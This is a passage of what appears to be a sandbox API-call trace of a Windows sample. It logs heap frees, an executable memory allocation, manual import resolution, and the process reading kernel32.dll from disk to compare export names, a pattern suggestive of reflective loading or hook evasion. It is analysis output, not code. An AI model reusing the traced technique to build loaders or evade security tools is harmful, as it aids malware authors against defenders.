lpMem=0x35f7db0 | out: hHeap=0x460000) returned 1 [0112.613] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x360afc0 | out: hHeap=0x460000) returned 1 [0112.613] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x361e1d0 | out: hHeap=0x460000) returned 1 [0112.613] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x36313e0 | out: hHeap=0x460000) returned 1 [0112.613] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x36445f0 | out: hHeap=0x460000) returned 1 [0112.616] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3657800 | out: hHeap=0x460000) returned 1 [0112.617] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x366aa10 | out: hHeap=0x460000) returned 1 [0112.617] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x367dc20 | out: hHeap=0x460000) returned 1 [0112.617] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3690e30 | out: hHeap=0x460000) returned 1 [0112.922] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x36a4040 | out: hHeap=0x460000) returned 1 [0112.925] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x36b7250 | out: hHeap=0x460000) returned 1 [0112.928] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x36ca460 | out: hHeap=0x460000) returned 1 [0112.928] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x36dd670 | out: hHeap=0x460000) returned 1 [0112.929] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x36f0880 | out: hHeap=0x460000) returned 1 [0112.930] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3703a90 | out: hHeap=0x460000) returned 1 [0112.930] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3716ca0 | out: hHeap=0x460000) returned 1 [0112.930] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3729eb0 | out: hHeap=0x460000) returned 1 [0112.932] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x373d0c0 | out: hHeap=0x460000) returned 1 [0112.935] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37502d0 | out: hHeap=0x460000) returned 1 [0112.935] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37634e0 | out: hHeap=0x460000) returned 1 [0112.938] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37766f0 | out: hHeap=0x460000) returned 1 [0112.940] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3789900 | out: hHeap=0x460000) returned 1 [0112.940] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x379cb10 | out: hHeap=0x460000) returned 1 [0112.943] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37afd20 | out: hHeap=0x460000) returned 1 [0112.945] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37c2f30 | out: hHeap=0x460000) returned 1 [0112.950] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37d6140 | out: hHeap=0x460000) returned 1 [0112.950] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37e9350 | out: hHeap=0x460000) returned 1 [0112.951] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x37fc560 | out: hHeap=0x460000) returned 1 [0112.951] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x380f770 | out: hHeap=0x460000) returned 1 [0112.952] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3822980 | out: hHeap=0x460000) returned 1 [0112.953] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3835b90 | out: hHeap=0x460000) returned 1 [0112.953] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3848da0 | out: hHeap=0x460000) returned 1 [0113.153] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x385bfb0 | out: hHeap=0x460000) returned 1 [0113.156] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x386f1c0 | out: hHeap=0x460000) returned 1 [0113.156] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x38823d0 | out: hHeap=0x460000) returned 1 [0113.158] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x38955e0 | out: hHeap=0x460000) returned 1 [0113.160] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x38a87f0 | out: hHeap=0x460000) returned 1 [0113.163] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x38bba00 | out: hHeap=0x460000) returned 1 [0113.166] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x38cec10 | out: hHeap=0x460000) returned 1 [0113.170] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x38e1e20 | out: hHeap=0x460000) returned 1 [0113.170] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x38f5030 | out: hHeap=0x460000) returned 1 [0113.171] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3908240 | out: hHeap=0x460000) returned 1 [0113.172] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x391b450 | out: hHeap=0x460000) returned 1 [0113.172] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x392e660 | out: hHeap=0x460000) returned 1 [0113.174] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3941870 | out: hHeap=0x460000) returned 1 [0113.175] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3954a80 | out: hHeap=0x460000) returned 1 [0113.176] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3967c90 | out: hHeap=0x460000) returned 1 [0113.178] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x397aea0 | out: hHeap=0x460000) returned 1 [0113.179] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x398e0b0 | out: hHeap=0x460000) returned 1 [0113.181] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x39a12c0 | out: hHeap=0x460000) returned 1 [0113.183] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x39b44d0 | out: hHeap=0x460000) returned 1 [0113.188] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x39c76e0 | out: hHeap=0x460000) returned 1 [0113.411] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x39da8f0 | out: hHeap=0x460000) returned 1 [0113.416] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x39edb00 | out: hHeap=0x460000) returned 1 [0113.416] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3a00d10 | out: hHeap=0x460000) returned 1 [0113.417] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3a13f20 | out: hHeap=0x460000) returned 1 [0113.418] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3a27130 | out: hHeap=0x460000) returned 1 [0113.420] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3a3a340 | out: hHeap=0x460000) returned 1 [0113.422] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3a4d550 | out: hHeap=0x460000) returned 1 [0113.424] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3a60760 | out: hHeap=0x460000) returned 1 [0113.427] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x3a73970 | out: hHeap=0x460000) returned 1 [0113.431] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4aa660 | out: hHeap=0x460000) returned 1 [0113.432] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0113.435] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0113.436] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0113.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0113.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0113.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0113.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0113.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0113.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0113.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0113.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0113.438] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0113.439] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0113.439] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0113.439] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0113.439] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0113.439] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0113.439] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0113.439] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0113.440] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0113.440] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x48db10 | out: hHeap=0x460000) returned 1 [0113.440] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0113.627] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4709c0 | out: hHeap=0x460000) returned 1 [0113.628] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0113.629] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0113.629] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0113.629] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0113.629] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0113.629] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0113.631] GetProcessHeap () returned 0x460000 [0113.631] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x68) returned 0x468cd0 [0113.631] GetProcessHeap () returned 0x460000 [0113.631] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x4792d0 [0113.632] GetProcessHeap () returned 0x460000 [0113.632] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x48) returned 0x470830 [0113.632] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0113.632] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0113.632] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0113.632] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0113.633] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0113.633] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0113.633] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0113.633] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0113.633] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0113.633] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0113.633] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0113.634] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0113.642] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0113.642] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0113.642] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0113.642] GetProcessHeap () returned 0x460000 [0113.642] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xac430) returned 0x48c5c0 [0113.644] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0113.644] ReadFile (in: hFile=0x134, lpBuffer=0x48c5c0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x48c5c0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0113.654] CloseHandle (hObject=0x134) returned 1 [0113.654] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0113.662] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0113.662] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0113.662] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0113.662] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0113.662] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0113.662] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0113.662] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0113.662] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0113.662] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0113.662] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0113.663] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0113.663] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0113.664] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0113.665] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0113.666] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0113.666] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.666] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.666] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0113.666] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0113.667] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0113.667] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.667] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.667] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.667] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0113.667] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0113.667] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0113.667] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0113.668] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0113.668] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", 